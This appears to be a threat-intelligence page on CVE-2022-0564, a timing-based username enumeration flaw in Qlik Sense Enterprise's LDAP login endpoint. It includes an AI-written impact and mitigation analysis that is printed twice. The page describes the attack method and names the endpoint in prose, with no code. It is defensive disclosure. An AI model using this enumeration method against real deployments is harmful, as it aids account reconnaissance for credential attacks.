CVE-2022-0564: CWE-204: Observable Response Discrepancy in Qlik Sense Qlik Sense Enterprise on Windows
A vulnerability in Qlik Sense Enterprise on Windows could allow an remote attacker to enumerate domain user accounts. An attacker could exploit this vulnerability by sending authentication requests to an affected system. A successful exploit could allow the attacker to compare the response time that are returned by the affected system to determine which accounts are valid user accounts. Affected systems are only vulnerable if they have LDAP configured. The affected URI is /internal_forms_authentication/ the response time of the form is longer if the supplied user does not exists and shorter if the user exists.
AI Analysis
Technical Summary
CVE-2022-0564 is a vulnerability identified in Qlik Sense Enterprise on Windows, specifically affecting version 14.x when LDAP authentication is configured. The vulnerability arises from an observable response discrepancy in the authentication mechanism at the URI endpoint /internal_forms_authentication/. An attacker can exploit this by sending authentication requests with different usernames and measuring the response times. The system responds faster when the username exists and slower when it does not, allowing an attacker to enumerate valid domain user accounts remotely without authentication. This side-channel timing attack leverages the difference in processing time to distinguish between valid and invalid usernames, potentially aiding further targeted attacks such as brute force or social engineering. The vulnerability is categorized under CWE-204 (Observable Response Discrepancy), which involves information leakage through timing differences. No known exploits have been reported in the wild, and no official patches have been linked, indicating that mitigation may require configuration changes or vendor updates. The vulnerability does not require user interaction or prior authentication, increasing its risk profile. However, the impact is limited to user enumeration and does not directly allow privilege escalation or code execution.
Potential Impact
For European organizations using Qlik Sense Enterprise on Windows version 14.x with LDAP authentication enabled, this vulnerability poses a moderate risk. The ability to enumerate valid domain user accounts can facilitate reconnaissance activities by threat actors, enabling more efficient password guessing, phishing, or targeted attacks against identified users. This can lead to compromised credentials, unauthorized access, and potential lateral movement within corporate networks. Organizations in sectors with high-value data or critical infrastructure may face increased risk if attackers leverage this information to escalate attacks. While the vulnerability does not directly compromise system integrity or availability, the information disclosure can be a stepping stone for more severe intrusions. Given the widespread use of Qlik Sense in data analytics and business intelligence across Europe, especially in finance, manufacturing, and public sectors, the threat could have significant operational and reputational consequences if exploited.
Mitigation Recommendations
To mitigate this vulnerability, organizations should first verify if LDAP authentication is enabled on their Qlik Sense Enterprise 14.x deployments. If so, consider temporarily disabling LDAP authentication or restricting access to the /internal_forms_authentication/ endpoint via network segmentation or firewall rules to trusted IP addresses only. Implement rate limiting and monitoring on authentication endpoints to detect and block abnormal request patterns indicative of enumeration attempts. Additionally, applying any vendor-provided patches or updates as they become available is critical. If patches are not yet released, consider deploying Web Application Firewalls (WAFs) with custom rules to detect timing-based enumeration attempts. Logging and alerting on authentication failures and unusual response time patterns can help in early detection. Finally, educating users on phishing risks and enforcing strong multi-factor authentication (MFA) can reduce the impact of credential harvesting facilitated by user enumeration.
Affected Countries
Germany, United Kingdom, France, Netherlands, Sweden, Italy, Spain, Belgium, Poland, Ireland
CVE-2022-0564: CWE-204: Observable Response Discrepancy in Qlik Sense Qlik Sense Enterprise on Windows
Description
A vulnerability in Qlik Sense Enterprise on Windows could allow an remote attacker to enumerate domain user accounts. An attacker could exploit this vulnerability by sending authentication requests to an affected system. A successful exploit could allow the attacker to compare the response time that are returned by the affected system to determine which accounts are valid user accounts. Affected systems are only vulnerable if they have LDAP configured. The affected URI is /internal_forms_authentication/ the response time of the form is longer if the supplied user does not exists and shorter if the user exists.
AI-Powered Analysis
Technical Analysis
CVE-2022-0564 is a vulnerability identified in Qlik Sense Enterprise on Windows, specifically affecting version 14.x when LDAP authentication is configured. The vulnerability arises from an observable response discrepancy in the authentication mechanism at the URI endpoint /internal_forms_authentication/. An attacker can exploit this by sending authentication requests with different usernames and measuring the response times. The system responds faster when the username exists and slower when it does not, allowing an attacker to enumerate valid domain user accounts remotely without authentication. This side-channel timing attack leverages the difference in processing time to distinguish between valid and invalid usernames, potentially aiding further targeted attacks such as brute force or social engineering. The vulnerability is categorized under CWE-204 (Observable Response Discrepancy), which involves information leakage through timing differences. No known exploits have been reported in the wild, and no official patches have been linked, indicating that mitigation may require configuration changes or vendor updates. The vulnerability does not require user interaction or prior authentication, increasing its risk profile. However, the impact is limited to user enumeration and does not directly allow privilege escalation or code execution.
Potential Impact
For European organizations using Qlik Sense Enterprise on Windows version 14.x with LDAP authentication enabled, this vulnerability poses a moderate risk. The ability to enumerate valid domain user accounts can facilitate reconnaissance activities by threat actors, enabling more efficient password guessing, phishing, or targeted attacks against identified users. This can lead to compromised credentials, unauthorized access, and potential lateral movement within corporate networks. Organizations in sectors with high-value data or critical infrastructure may face increased risk if attackers leverage this information to escalate attacks. While the vulnerability does not directly compromise system integrity or availability, the information disclosure can be a stepping stone for more severe intrusions. Given the widespread use of Qlik Sense in data analytics and business intelligence across Europe, especially in finance, manufacturing, and public sectors, the threat could have significant operational and reputational consequences if exploited.
Mitigation Recommendations
To mitigate this vulnerability, organizations should first verify if LDAP authentication is enabled on their Qlik Sense Enterprise 14.x deployments. If so, consider temporarily disabling LDAP authentication or restricting access to the /internal_forms_authentication/ endpoint via network segmentation or firewall rules to trusted IP addresses only. Implement rate limiting and monitoring on authentication endpoints to detect and block abnormal request patterns indicative of enumeration attempts. Additionally, applying any vendor-provided patches or updates as they become available is critical. If patches are not yet released, consider deploying Web Application Firewalls (WAFs) with custom rules to detect timing-based enumeration attempts. Logging and alerting on authentication failures and unusual response time patterns can help in early detection. Finally, educating users on phishing risks and enforcing strong multi-factor authentication (MFA) can reduce the impact of credential harvesting facilitated by user enumeration.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- DIVD
- Date Reserved
- 2022-02-10T00:00:00
- Cisa Enriched
- false
Threat ID: 682d983ec4522896dcbf0253
Added to database: 5/21/2025, 9:09:18 AM
Last enriched: 6/24/2025, 1:40:40 PM
Last updated: 8/14/2025, 11:52:54 PM
Views: 24
Related Threats
CVE-2025-8464: CWE-23 Relative Path Traversal in glenwpcoder Drag and Drop Multiple File Upload for Contact Form 7
MediumCVE-2025-7499: CWE-862 Missing Authorization in wpdevteam BetterDocs – Advanced AI-Driven Documentation, FAQ & Knowledge Base Tool for Elementor & Gutenberg with Encyclopedia, AI Support, Instant Answers
MediumCVE-2025-8898: CWE-862 Missing Authorization in magepeopleteam E-cab Taxi Booking Manager for Woocommerce
CriticalCVE-2025-8896: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cozmoslabs User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor
MediumCVE-2025-8089: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in mdempfle Advanced iFrame
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.